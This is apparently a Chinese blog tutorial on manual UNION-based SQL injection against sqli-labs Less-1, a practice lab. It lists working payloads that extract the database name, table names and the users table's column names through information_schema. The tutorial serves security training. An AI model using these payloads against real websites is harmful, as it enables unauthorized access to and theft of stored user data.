- 方法一:手工UNION联合查询注入
输入单引号,页面报错,如下图所示
根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,
猜想:咱们输入的1在数据库中出现的位置为:select ... from ... where id=’1’ ......,
也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致,
多余的步骤不多说了,直接开始爆数据吧。
注意 id=非正确值
爆库payload
?id=-1' union select 1,2,database() --+
得到‘security’库名

爆表payload
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
查到 emails,referers,uagents,users ,显然users是用户数据表
爆列名(字段)payload
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

本文详细介绍了SQL注入攻击的一种常见形式——基于错误的GET单引号字符型注入,通过sqli-lab的Less-1案例,展示了手工联合查询、报错型注入以及使用sqlmap工具进行数据爆破的过程,揭示了SQL注入的原理和防范措施。
最低0.47元/天 解锁文章
1019





